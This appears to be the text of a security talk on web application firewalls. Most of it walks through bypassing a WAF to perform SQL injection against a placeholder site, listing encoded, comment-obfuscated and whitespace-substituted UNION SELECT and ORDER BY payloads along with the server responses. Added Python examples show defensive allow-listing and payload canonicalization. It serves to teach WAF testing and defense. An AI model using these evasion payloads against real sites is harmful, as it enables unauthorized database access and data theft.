Pros:
Less time to implement.
Cons:
Less protection.
Positive Model
A positive security model enforces positive behaviour by learning the application logic and building a security policy of valid, known requests as a user interacts with the application.
Example:
On page news.jsp, the field id may only accept the characters [0-9], with values from 0 up to 65535.
Using intval conditions on the page (accepts only integers).
Pros:
Better performance (less rules).
Less false positives.
Cons:
Much more time to implement.
Some vendors provide an automatic learning mode; it helps, but is far from perfect.
In the end, you always need a skilled human to review the policies.
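The positive model above, as an added example (not code from the slides): a per-page allow-list policy with one validator per parameter, plus a toy learning mode that infers rules from observed traffic and shows why its output still needs a human reviewer. `HAND_POLICY`, `check_request` and `learn_policy` are this example's own names.

```python
import re

# Added example of a positive (allow-list) model, not code from the slides: each page
# enumerates the parameters it accepts and one validator per parameter; anything not
# enumerated is denied. Hand-written policy for the slides' news.jsp example:
# id is [0-9] only, in the range 0..65535.
_DIGITS = re.compile(r"[0-9]{1,5}")
HAND_POLICY = {
    "news.jsp": {"id": lambda v: bool(_DIGITS.fullmatch(v)) and 0 <= int(v) <= 65535},
}


def check_request(policy, page, params):
    """Return (allowed, reason). Unknown pages, unknown parameters and failed validators are denied."""
    rules = policy.get(page)
    if rules is None:
        return False, f"no policy for page {page!r}"
    for name, value in params.items():
        validator = rules.get(name)
        if validator is None:
            return False, f"parameter {name!r} not in policy"
        if not validator(value):
            return False, f"parameter {name!r} failed validation"
    return True, "ok"


def learn_policy(observations):
    """Toy 'automatic learning mode' (hypothetical): build a policy from observed clean traffic.

    Digit-only values become a numeric range [min, max]; anything else becomes an exact
    allow-list. This is why learned policies need human review: the learned range for
    news.jsp/id is only as wide as the sample, so a legitimate id=100 is rejected
    until a reviewer widens it to the real 0..65535.
    """
    seen = {}
    for page, params in observations:
        for name, value in params.items():
            seen.setdefault((page, name), []).append(value)
    policy = {}
    for (page, name), values in seen.items():
        if all(_DIGITS.fullmatch(v) for v in values):
            lo, hi = min(map(int, values)), max(map(int, values))
            rule = lambda v, lo=lo, hi=hi: bool(_DIGITS.fullmatch(v)) and lo <= int(v) <= hi
        else:
            allowed = frozenset(values)
            rule = lambda v, allowed=allowed: v in allowed
        policy.setdefault(page, {})[name] = rule
    return policy
```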
Mix Model
Fingerprinting WAF
Request and response for ModSecurity firewall (screenshot)
Response for WebKnight firewall (screenshot)
Using WaFw00f.py
https://abc.com/index.php?id=1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 ' at line 6
https://abc.com/index.php?id=1
HTTP/1.1 403 Forbidden Error
or
HTTP/1.1 406 Not Acceptable
or
HTTP/1.1 404 Not Found
or
HTTP/1.1 500 Internal Server Error
or
HTTP/1.1 400 Bad Request
Some recon on WAF
https://abc.com/index.php?id=1
HTTP/1.1 200 OK
Assumptions in mind
Is the ORDER keyword blocked?
Is the ORDER BY keyword blocked?
Is there any alternative to an ORDER BY query?
Are spaces blocked?
Let's try
https://abc.com/index.php?id=1%27 ORDER %23
HTTP/1.1 403 Forbidden
Assumptions in mind
ORDER keyword is blocked
Check again: is ORDER blocked?
https://abc.com/index.php?id=1%27ORDER%23
HTTP/1.1 200 OK
New assumptions in mind
ORDER keyword is not blocked
What is blocked, then?
No assumptions in mind
Using a combination of inline comments, URL encoding and junk characters instead of spaces, like:
Order/%2aJUNKCHARACTERS%2a/by/%2aJUNKCHARACTERS%2a/1
Order%2f*JUNKCHARACTERS*%2fby%2f**JUNKCHARACTERS%2f1
Techniques to bypass spaces
The query will be:
ORDER%0aby%0a1
ORDER%0bby%0b1
ORDER%0cby%0c1
ORDER%0Dby%0D1
ORDER%A0by%A01
ORDER%0D%0Aby%0D%0A1
https://abc.com/index.php?id=1%27/**/ORDER/**/by/**/1%23
HTTP/1.1 200 OK
Assumptions in mind
Spaces are Blocked ??
https://abc.com/index.php?id=1%27/**/UNION/**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind
Spaces were bypassed using inline comments... still blocked???
UNION keyword is blocked ??
SELECT keyword is blocked ??
Integers are blocked ??
Commas are blocked ??
Combination of UNION SELECT is blocked ??
SELECT with integers is blocked ??
Techniques to Bypass
If UNION is blocked
%53nion
%2553nion
%55%4e%49%4f%4e (UNION) Triple URL Encoding
https://abc.com/index.php?id=1%27/**//*!50000UNION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!40000UNION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!%55NION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!%55NIoN*//**/SELECT/**/1,2,3%23
Assumptions in mind
UNION keyword is blocked ??
SELECT keyword is blocked ??
Integers are blocked ??
Commas are blocked ??
Combination of UNION SELECT is blocked ??
SELECT with integers is blocked ??
https://abc.com/index.php?id=1%27/**//*!50000UNION*/1,2,3%23
HTTP/1.1 200 OK
https://abc.com/index.php?id=1%27/**//*!50000SELECT*/1,2,3%23
HTTP/1.1 200 OK
Assumptions in mind
UNION keyword is NOT blocked.
SELECT keyword is NOT blocked.
Integers are NOT blocked.
Commas are NOT blocked.
Combination of UNION SELECT is blocked ?
SELECT with integers is NOT blocked.
Techniques to bypass combination of union select
Using combination of inline comments and URL encoding :
/*!50000%55niOn*/ /*!50000%53eLECT*/
Union%23%0aSELECT
Union%23%0bSELECT
Union%23%0cSELECT
Union%23%0DSELECT
Union%23%A0SELECT
UNION
%23ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890%0ASELECT
Sometimes the amount of junk needs to be increased as required:
UNION
%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Techniques to bypass combination of union select
Using Distinct statement
Assumptions in mind
UNION keyword is NOT blocked.
SELECT keyword is NOT blocked.
Integers are NOT blocked.
Commas are blocked.
Combination of UNION SELECT is NOT blocked ?
SELECT with integers is NOT blocked.
SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c
Advanced way to bypass commas
https://abc.com/index.php?id=1%27/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/1)a/**/JOIN/**/(SELECT/**/2)b%23
HTTP/1.1 200 OK
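The defender's side of the space, keyword, UNION SELECT and comma tricks shown above, as an added example that is not from the slides: a canonicalization pass a WAF should run on each parameter before matching any signature, so that the encoded, commented and whitespace-substituted variants from the slides collapse back to "UNION SELECT" or "ORDER BY". `canonicalize`, `flags` and the two rules are this example's own; the sample inputs in the test are the slides' own payloads.

```python
import re
from urllib.parse import unquote

# Added example, not code from the slides: a defender-side canonicalizer that undoes the
# transformations a signature-only WAF is evaded with, followed by two example rules.
_WS = re.compile(r"[ \t\n\x0b\x0c\r\xa0]+")           # %20 %09 %0a %0b %0c %0d %a0
_VERSIONED = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)  # /*!50000UNION*/ -> UNION
_COMMENT = re.compile(r"/\*.*?\*/", re.S)              # /**/ and /*JUNK*/
_MARKERS = re.compile(r"#|--")                          # comment openers become separators
_UNION_SELECT = re.compile(r"\bUNION\b(?:\s+(?:ALL|DISTINCT))?\s+SELECT\b")
_ORDER_BY = re.compile(r"\bORDER\s+BY\b")


def canonicalize(raw: str, max_rounds: int = 3) -> str:
    """Normalize one parameter value before any signature is matched.

    URL-decode repeatedly (so %2553 collapses like %53; latin-1 keeps %A0 as a
    non-breaking space), keep the body of MySQL versioned comments because the
    server executes it, replace ordinary /*...*/ comments with a space, turn '#'
    and '--' into separators rather than dropping what follows (a detector must
    stay conservative), then collapse every whitespace variant and fold case.
    """
    s = raw
    for _ in range(max_rounds):
        decoded = unquote(s, encoding="latin-1")
        if decoded == s:
            break
        s = decoded
    s = _VERSIONED.sub(r" \1 ", s)
    s = _COMMENT.sub(" ", s)
    s = _MARKERS.sub(" ", s)
    return _WS.sub(" ", s).strip().upper()


def flags(raw: str) -> list:
    """Evaluate the signatures on the canonical form; return the names of the rules that hit."""
    canon = canonicalize(raw)
    hits = []
    if _UNION_SELECT.search(canon):
        hits.append("union-select")
    if _ORDER_BY.search(canon):
        hits.append("order-by")
    return hits
```

Run the slides' payloads through `flags` and each one lands on the rule it was written to evade; a plain `id=1` produces no hit.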
Similar Approach for other Vulnerabilities
For XSS
For LFI / RFI
DEMO TIME
References
Images in slides 10, 11, 14, 15, 16, 17 taken from
http://www.mediafire.com/download/7a57hv5z25s58lh/WAF_Bypassing_By_RAFAYBALOCH.pdf
Thank you..!